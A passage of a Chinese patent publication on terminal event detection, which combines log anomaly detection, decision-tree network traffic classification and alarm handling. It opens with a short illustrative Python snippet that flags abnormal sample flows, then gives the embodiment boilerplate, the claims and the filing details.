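        score = sum(w for w, v in zip(weights, votes) if v == 1)
        if score > threshold:
            abnormal.append(f)
            # similar traffic = same protocol and the same set of trees firing
            clusters[(f.proto, votes)].append(f)
    return {"weights": weights, "abnormal": abnormal, "clusters": dict(clusters)}


# Constructed unlabelled flows to classify.
SAMPLE_FLOWS = [
    Flow("10.0.0.11", "10.0.0.9", 22, "tcp", 20, 3000, 8.0),
    Flow("10.0.0.11", "10.0.0.9", 3389, "tcp", 5000, 200000, 8.0),
    Flow("10.0.0.12", "198.51.100.9", 9001, "tcp", 150, 300000, 12.0),
    Flow("10.0.0.13", "10.0.0.200", 5060, "udp", 2000, 200000, 20.0),
    Flow("10.0.0.13", "192.0.2.20", 4000, "udp", 9000, 360000, 30.0),
    Flow("10.0.0.14", "10.0.0.9", 445, "tcp", 4500, 180000, 6.0),
]

if __name__ == "__main__":
    result = second_detection_result(SAMPLE_FLOWS)
    print("tree weights:", result["weights"])
    for key, group in result["clusters"].items():
        print(key, [f"{f.src}->{f.dst}:{f.dport}" for f in group])
```

The dynamic weight is what keeps the noisy UDP tree in check: on the reference flows it fires on a legitimate VoIP-like flow as well as on a flood, so its precision is 0.5 and a lone vote from it cannot exceed the threshold; the VoIP-like sample flow therefore stays normal, while the UDP flood, on which two trees agree, is flagged. Grouping flagged flows by protocol and firing signature puts the two small-fast TCP flows in one cluster, which is the "similar traffic" the platform would present together.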
As an alternative, to determine whether the target event occurs at the terminal device based on the first detection result and the second detection result, the device performs at least one of: determining that the target event occurs at the terminal device when the first detection result indicates that the system log data contains an abnormal log; and determining that the target event occurs at the terminal device when the second detection result indicates that abnormal traffic exists in the network traffic data.
As an alternative, to generate the alarm message according to the target event when the target event exists, the device determines at least one of a file path and a process path related to the target event, determines the event type of the target event based on the file path and/or the process path, and generates the alarm message according to the event type.
The device is further configured to, when the event type is the file alarm type, control the operation and maintenance management platform to send a monitoring instruction to the terminal device through the lightweight security proxy service so as to acquire the system environment information of the terminal device, and to store the system environment information in a log file under the alarm record directory, where the system environment information includes information on the processes currently running on the terminal device.
The device is further configured to, when the event type is the process alarm type and the same historical alarm type is found, store the system environment information in the log file and call a target processing script to process the target event, where the target processing script performs a preset repair operation to repair the system error caused by the target event; and, when the event type is the process alarm type and no matching historical alarm type is found, to set the reverse proxy server forwarding weight of the terminal device to 0 through the lightweight security proxy service.
In the present embodiment, the term "module" or "unit" refers to a computer program or a part of a computer program having a predetermined function and working together with other relevant parts to achieve a predetermined object, and may be implemented in whole or in part by using software, hardware (such as a processing circuit or a memory), or a combination thereof. Also, a processor (or multiple processors or memories) may be used to implement one or more modules or units. Furthermore, each module or unit may be part of an overall module or unit that incorporates the functionality of the module or unit.
The specific manner in which the various modules perform their operations in the apparatus of the above embodiments has been described in detail in connection with the embodiments of the method, and will not be described in detail here.
According to one aspect of the present application, a computer program product is provided, the computer program product comprising a computer program.
The foregoing embodiment numbers of the present application are merely for the purpose of description, and do not represent the advantages or disadvantages of the embodiments.
Fig. 7 schematically shows a block diagram of a computer system of an electronic device for implementing an embodiment of the application.
It should be noted that, the computer system 700 of the electronic device shown in fig. 7 is only an example, and should not impose any limitation on the functions and the application scope of the embodiments of the present application.
As shown in fig. 7, the computer system 700 includes a central processing unit 701 (Central Processing Unit, CPU) which can perform various appropriate actions and processes according to a program stored in a Read-Only Memory 702 (ROM) or a program loaded from a storage section 708 into a random access Memory 703 (Random Access Memory, RAM). In the random access memory 703, various programs and data necessary for the system operation are also stored. The central processing unit 701, the read only memory 702, and the random access memory 703 are connected to each other via a bus 704. An Input/Output interface 705 (i.e., an I/O interface) is also connected to bus 704.
Connected to the input/output interface 705 are an input section 706 including a keyboard, a mouse and the like; an output section 707 including a cathode ray tube (CRT), a liquid crystal display (LCD) and the like, and a speaker and the like; a storage section 708 including a hard disk and the like; and a communication section 709 including a network interface card such as a local area network card, a modem and the like. The communication section 709 performs communication processing via a network such as the internet. A drive 710 is also connected to the input/output interface 705 as needed. A removable medium 711 such as a magnetic disk, an optical disk, a magneto-optical disk or a semiconductor memory is mounted on the drive 710 as necessary, so that a computer program read from it is installed into the storage section 708 as necessary.
In particular, the processes described in the various method flowcharts may be implemented as computer software programs according to embodiments of the application. For example, embodiments of the present application include a computer program product comprising a computer program embodied on a computer readable medium, the computer program comprising program code for performing the method shown in the flowcharts. In such an embodiment, the computer program may be downloaded and installed from a network via the communication portion 709, and/or installed from the removable medium 711. The computer programs, when executed by the central processor 701, perform the various functions defined in the system of the present application.
According to still another aspect of the embodiment of the present application, there is also provided an electronic device for implementing the event detection method described above, where the electronic device may be a terminal device or a server as shown in fig. 1. The present embodiment is described taking the electronic device as a terminal device as an example. As shown in fig. 8, the electronic device comprises a memory 802 and a processor 804, the memory 802 having stored therein a computer program, the processor 804 being arranged to perform the steps of any of the method embodiments described above by means of the computer program.
Alternatively, in this embodiment, the electronic device may be located in at least one network device of a plurality of network devices of the computer network.
Alternatively, in the present embodiment, the above-described processor may be configured to execute the method in the embodiments of the present application by a computer program.
Alternatively, it will be appreciated by those of ordinary skill in the art that the configuration shown in fig. 8 is merely illustrative, and that fig. 8 is not intended to limit the configuration of the electronic device described above. For example, the electronic device may also include more or fewer components (e.g., network interfaces, etc.) than shown in FIG. 8, or have a different configuration than shown in FIG. 8.
The memory 802 may be used to store software programs and modules, such as program instructions/modules corresponding to the event detection methods and apparatuses in the embodiments of the present application, and the processor 804 executes the software programs and modules stored in the memory 802, thereby performing various functional applications and data processing, that is, implementing the event detection methods described above. Memory 802 may include high-speed random access memory, and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory, or other non-volatile solid-state memory. In some examples, memory 802 may further include memory remotely located relative to processor 804, which may be connected to the terminal via a network. Examples of such networks include, but are not limited to, the internet, intranets, local area networks, mobile communication networks, and combinations thereof. The memory 802 may be used to store, but is not limited to, information such as operation data. As an example, as shown in fig. 8, the memory 802 may include, but is not limited to, the deployment module 602, the acquisition module 604, the execution module 606, and the determination module 608 in the event detection device. In addition, other module units in the event detection apparatus may be included, but are not limited to, and are not described in detail in this example.
Optionally, the transmission device 806 is used to receive or transmit data via a network. Specific examples of the network described above may include wired networks and wireless networks. In one example, the transmission means 806 includes a network adapter (Network Interface Controller, NIC) that can connect to other network devices and routers via a network cable to communicate with the internet or a local area network. In one example, the transmission device 806 is a Radio Frequency (RF) module for communicating wirelessly with the internet.
The electronic device further comprises a display 808 for displaying the alarm message and a connection bus 810 for connecting the individual module components of the electronic device.
In other embodiments, the terminal device or the server may be a node in a distributed system, where the distributed system may be a blockchain system, and the blockchain system may be a distributed system formed by connecting the plurality of nodes through a network communication. The nodes may form a peer-to-peer network, and any type of computing device, such as a server, a terminal, etc., may become a node in the blockchain system by joining the peer-to-peer network.
According to one aspect of the present application, there is provided a computer-readable storage medium, from which a processor of an electronic device reads the computer instructions, the processor executing the computer instructions, causing the electronic device to perform the event detection method provided in various alternative implementations of the event detection aspect described above.
Alternatively, in the present embodiment, the above-described computer-readable storage medium may be configured to store a program for executing the method in the embodiments of the present application.
Alternatively, in this embodiment, all or part of the steps in the various methods of the above embodiments may be implemented by a program for instructing the terminal device related hardware, and the program may be stored in a computer readable storage medium, where the storage medium may include a flash disk, a Read-Only Memory (ROM), a random access Memory (Random Access Memory, RAM), a magnetic disk, or an optical disk.
The integrated units in the above embodiments may be stored in the computer-readable storage medium described above if they are implemented in the form of software functional units and sold or used as separate products. Based on this understanding, the technical solution of the present application may be embodied essentially, or in part, or as a whole, in the form of a software product stored in a storage medium, comprising several instructions for causing one or more electronic devices to perform all or part of the steps of the method described in the various embodiments of the present application.
In the foregoing embodiments of the present application, the descriptions of the embodiments are emphasized, and for a portion of this disclosure that is not described in detail in this embodiment, reference is made to the related descriptions of other embodiments.
In the several embodiments provided in the present application, it should be understood that the disclosed application program may be implemented in other manners. The apparatus embodiments described above are merely exemplary; the division of the units is merely a logical function division and may be implemented in another manner; for example, multiple units or components may be combined or integrated into another system, or some features may be omitted or not performed. The coupling, direct coupling or communication connection shown or discussed between components may be through some interfaces, units or modules, and may be electrical or in other forms.
The units described as separate components may or may not be physically separate, and the components shown as units may or may not be physical units; they may be located in one place or distributed over a plurality of network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, each functional unit in the embodiments of the present application may be integrated in one processing unit, or each unit may exist alone physically, or two or more units may be integrated in one unit. The integrated units may be implemented in hardware or in software functional units.
The foregoing is merely a preferred embodiment of the present application; it should be noted that those skilled in the art may make modifications and adaptations without departing from the principles of the present application, and such modifications are intended to fall within the scope of the present application.

Claims (11)

1. An event detection method, comprising:
Deploying lightweight security proxy service on the terminal equipment;
Collecting operation data of the terminal equipment through the lightweight security proxy service;
performing abnormal value detection operation on system log data in the operation data, determining a first detection result, performing decision tree detection operation on network flow data in the operation data, and determining a second detection result;
Determining whether a target event occurs to the terminal equipment based on the first detection result and the second detection result;
And generating an alarm message according to the target event in the presence of the target event, wherein the alarm message comprises at least one of a file path and a process path which cause the target event to occur, and the file path and the process path are used for locating the source and the influence range of the target event.
2. The method of claim 1, wherein performing an outlier detection operation on system log data in the operational data, determining a first detection result comprises:
Processing the system log data according to a long-term and short-term memory network model to obtain a target threshold range;
And carrying out regression analysis on the system log data based on the target threshold range, determining the first detection result, and/or detecting the system log data according to a predetermined keyword dictionary, and determining the first detection result, wherein the first detection result is used for indicating whether the system log data has abnormality or not.
3. The method of claim 1, wherein the performing a decision tree detection operation on network traffic data in the operational data, determining a second detection result, comprises:
Performing eigenvalue decomposition operation on the network flow data to obtain a target eigenvector related to flow behavior;
Processing the target feature vector by using a pre-trained decision tree model to obtain similar network flow data;
Clustering the similar network traffic data to obtain the second detection result, wherein the second detection result is used for indicating whether abnormal traffic exists in the network traffic data;
And under the condition that the network traffic data comprises a network capturing data packet, converting the network capturing data packet into image data, and performing cluster analysis on the image data to obtain the second detection result.
4. A method according to any of claims 1 to 3, wherein said determining whether a target event has occurred at the terminal device based on the first detection result and the second detection result comprises at least one of:
Determining that the target event has occurred at the terminal device in the case that the first detection result indicates that the system log data contains an abnormal log;
and under the condition that the second detection result indicates that abnormal traffic exists in the network traffic data, determining that the terminal equipment generates the target event.
5. The method of claim 1, wherein generating an alert message from the target event in the presence of the target event comprises:
Determining at least one of the file path and the process path related to the target event in the presence of the target event;
determining an event type of the target event based on the file path and/or the process path;
and generating the alarm message according to the event type.
6. The method of claim 5, wherein the method further comprises:
And under the condition that the event type is a file alarm type, controlling an operation and maintenance management platform to send a monitoring instruction to the terminal equipment through the lightweight security proxy service so as to acquire system environment information of the terminal equipment, and storing the system environment information into a log file under an alarm record directory, wherein the system environment information comprises process information of the terminal equipment currently running.
7. The method of claim 5, wherein the method further comprises:
Storing the system environment information into the log file and calling a target processing script to process the target event under the condition that the event type is a process alarm type and the same historical alarm type is obtained, wherein the target processing script is used for executing a preset repairing operation so as to repair a system error caused by the target event;
And setting the reverse proxy server forwarding weight of the terminal equipment to 0 through the lightweight security proxy service in the case that the event type is the process alarm type and the same history alarm type is not acquired.
8. An event detection system, comprising:
the lightweight security agent module is used for collecting the operation data of the terminal equipment and executing the instruction sent by the operation and maintenance management platform;
The operation and maintenance management platform module is used for managing the access authority of the user and processing command distribution and flow mirroring;
the log monitoring analysis platform module is used for executing abnormal value detection operation on the system log data in the operation data, determining a first detection result, executing decision tree detection operation on the network flow data in the operation data and determining a second detection result;
the automatic operation and maintenance module performs batch script execution and automatic configuration deployment on the terminal equipment according to the system operation instruction and the configuration script;
And generating an alarm message according to the target event in the presence of the target event, wherein the alarm message comprises at least one file path and at least one process path which cause the occurrence of the target event, and the file path and the process path are used for positioning the source and the influence range of the target event.
9. A computer-readable storage medium, characterized in that the computer-readable storage medium comprises a stored computer program, wherein the computer program is executable by an electronic device to perform the method of any one of claims 1 to 7.
10. A computer program product comprising a computer program, characterized in that the computer program, when being executed by a processor, realizes the steps of the method according to any one of claims 1 to 7.
11. An electronic device comprising a memory and a processor, characterized in that the memory has stored therein a computer program, the processor being arranged to execute the method according to any of the claims 1 to 7 by means of the computer program.
CN202411843210.7A, priority date 2024-12-13, filing date 2024-12-13: Event detection method and device, storage medium and electronic equipment (Pending, CN119830273A (en))

Priority Applications (1)

Application Number: CN202411843210.7A (CN119830273A (en)); Priority Date: 2024-12-13; Filing Date: 2024-12-13; Title: Event detection method and device, storage medium and electronic equipment

Applications Claiming Priority (1)

Application Number: CN202411843210.7A (CN119830273A (en)); Priority Date: 2024-12-13; Filing Date: 2024-12-13; Title: Event detection method and device, storage medium and electronic equipment

Publications (1)

Publication Number: CN119830273A (en); Publication Date: 2025-04-15

Family

ID=95300325

Family Applications (1)

Application Number: CN202411843210.7A (Pending, CN119830273A (en)); Title: Event detection method and device, storage medium and electronic equipment; Priority Date: 2024-12-13; Filing Date: 2024-12-13

Country Status (1)

Country: CN (1); Link: CN119830273A (en)

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination